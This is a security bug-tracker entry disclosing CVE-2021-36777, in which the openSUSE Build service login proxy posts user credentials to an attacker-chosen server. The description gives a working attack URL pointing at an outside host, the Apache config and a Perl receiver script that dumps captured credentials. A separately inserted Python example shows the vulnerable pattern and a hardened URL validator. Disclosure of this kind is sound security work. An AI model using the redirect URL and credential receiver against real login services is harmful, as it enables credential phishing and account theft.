Headline
CVE-2021-36777: login-proxy sends password to attacker-provided domain
A Reliance on Untrusted Inputs in a Security Decision vulnerability in the login proxy of the openSUSE Build service allowed attackers to present users with an expected login form that then sends the cleartext credentials to an attacker-specified server. This issue affects: openSUSE Build service login-proxy-scripts versions prior to dc000cdfe9b9b715fb92195b1a57559362f689ef.
Description Bernhard Wiedemann 2021-10-01 08:01:27 UTC
When authenticating various SUSE and openSUSE services, we use a login-proxy so that the services themselves do not get to see user passwords.
Today, triggered by darix and Victor Pereira, I investigated issues about redirecting to attacker-provided URLs. I found that the login-proxy can send the credentials (filled by users into the login form) to an attacker-provided server.
Example attack URL: https://build.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/
On the server side is an apache (with a valid SSL cert for https) with a config line
    ScriptAlias /ICSLogin/auth-up /usr/lib/cgi-bin/testpost
pointing to this script:
    #!/usr/bin/perl -w
    # Test receiver for the attacker side: dumps whatever the victim's
    # browser POSTs to our /ICSLogin/auth-up, i.e. the proxied credentials.
    use strict;
    use CGI ":standard";

    print header("text/plain");
    if ($ENV{REQUEST_METHOD} eq "POST") {
        print "\n\nPOST params:\n";
        foreach (param()) {
            print "$_=" . param($_) . "\n";
        }
    }
also affected:
    https://hackweek.suse.com/ICSLogin/auth-up/?url=http://www.zq1.de/
    https://build.suse.de/ICSLogin/auth-up/?url=http://www.zq1.de/
not affected:
    https://en.opensuse.org/ICSLogin/auth-up/?url=http://www.zq1.de/
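The pattern behind the report above, and one way to close it, as an added example that is not the login-proxy-scripts code (that code is not on the page): the form action is taken from the attacker-controlled ?url= parameter, so the browser POSTs the credentials off-site. The hardened variant always posts to the proxy's own fixed endpoint and only ever uses ?url= as a post-login return target after validating it against an allow-list of hosts (dropping the parameter entirely, as comment 3 mentions, is the simpler option). The host names, endpoint path and helper names are assumptions made for the example.

```python
from html import escape
from urllib.parse import urlsplit, urlunsplit

# Assumed allow-list: hosts this proxy instance serves logins for.
ALLOWED_HOSTS = {"build.opensuse.org", "hackweek.suse.com"}

# Assumed endpoint the login form must always post to.
LOGIN_ENDPOINT = "/ICSLogin/auth-up"


def vulnerable_form_action(url_param):
    """The flaw from the report: the form action is copied straight from
    the ?url= parameter, so credentials go wherever the attacker pointed it."""
    return url_param or LOGIN_ENDPOINT


def safe_return_url(url_param, allowed_hosts=ALLOWED_HOSTS):
    """Validate a post-login return target.  Returns an absolute path on
    this origin or an https URL on an allow-listed host; anything else
    collapses to '/'."""
    if not url_param:
        return "/"
    # Browsers treat backslashes like slashes ('/\\evil' == '//evil') and
    # drop control characters; refuse both instead of guessing.
    if "\\" in url_param or any(ord(c) < 0x20 or ord(c) == 0x7F for c in url_param):
        return "/"
    parts = urlsplit(url_param)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: only an absolute path is accepted.
        if not parts.path.startswith("/"):
            return "/"
        return urlunsplit(("", "", parts.path, parts.query, ""))
    # Everything with a scheme or authority must be https on a known host.
    if parts.scheme != "https":
        return "/"
    try:
        port = parts.port  # raises ValueError on junk like ':abc'
    except ValueError:
        return "/"
    # Reject userinfo ('https://good@evil/') and explicit ports.
    if "@" in parts.netloc or port is not None:
        return "/"
    if (parts.hostname or "") not in allowed_hosts:  # hostname is lower-cased
        return "/"
    return urlunsplit(("https", parts.hostname, parts.path or "/", parts.query, ""))


def hardened_form_action(url_param):
    """The form posts to the proxy itself, regardless of ?url=."""
    return LOGIN_ENDPOINT


def login_form_html(url_param, hardened=True):
    """Render the login form.  The hardened form posts only to the proxy and
    carries the validated return target in a hidden field."""
    if hardened:
        action = hardened_form_action(url_param)
        ret = safe_return_url(url_param)
    else:
        action = vulnerable_form_action(url_param)
        ret = url_param or "/"
    return (
        f'<form method="POST" action="{escape(action, quote=True)}">\n'
        f'  <input type="hidden" name="url" value="{escape(ret, quote=True)}">\n'
        '  <input name="username"> <input type="password" name="password">\n'
        '  <input type="submit" value="Login">\n'
        "</form>"
    )


if __name__ == "__main__":
    attack = "http://www.zq1.de/"  # the attack URL's ?url= value from the report
    print("vulnerable:\n" + login_form_html(attack, hardened=False))
    print("hardened:\n" + login_form_html(attack))
```

The validator works on the parsed URL rather than on string prefixes: a prefix check like `startswith("https://build.opensuse.org")` is defeated by `https://build.opensuse.org.zq1.de/` or `https://build.opensuse.org@www.zq1.de/`, both of which the host comparison above rejects.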
Comment 1 Johannes Segitz 2021-10-01 08:06:42 UTC
Please use CVE-2021-36777 for this
Comment 3 Marcus Rückert 2021-10-06 11:22:17 UTC
The appliance is not affected. The proxy code is only used on our infra.
The bad part that allowed affecting the form via the url param is already patched out. The general removal of the url param needs testing.
Comment 4 Bernhard Wiedemann 2021-10-08 02:05:51 UTC
https://gitlab.suse.de/buildops/login-proxy-scripts/-/commit/d0b45f98fc74b254ee0585f26647cb6c8d2c871f by darix fixed this CVE-2021-36777
Comment 6 Johannes Segitz 2022-02-23 09:55:45 UTC
Making public. Fix is available and deployed.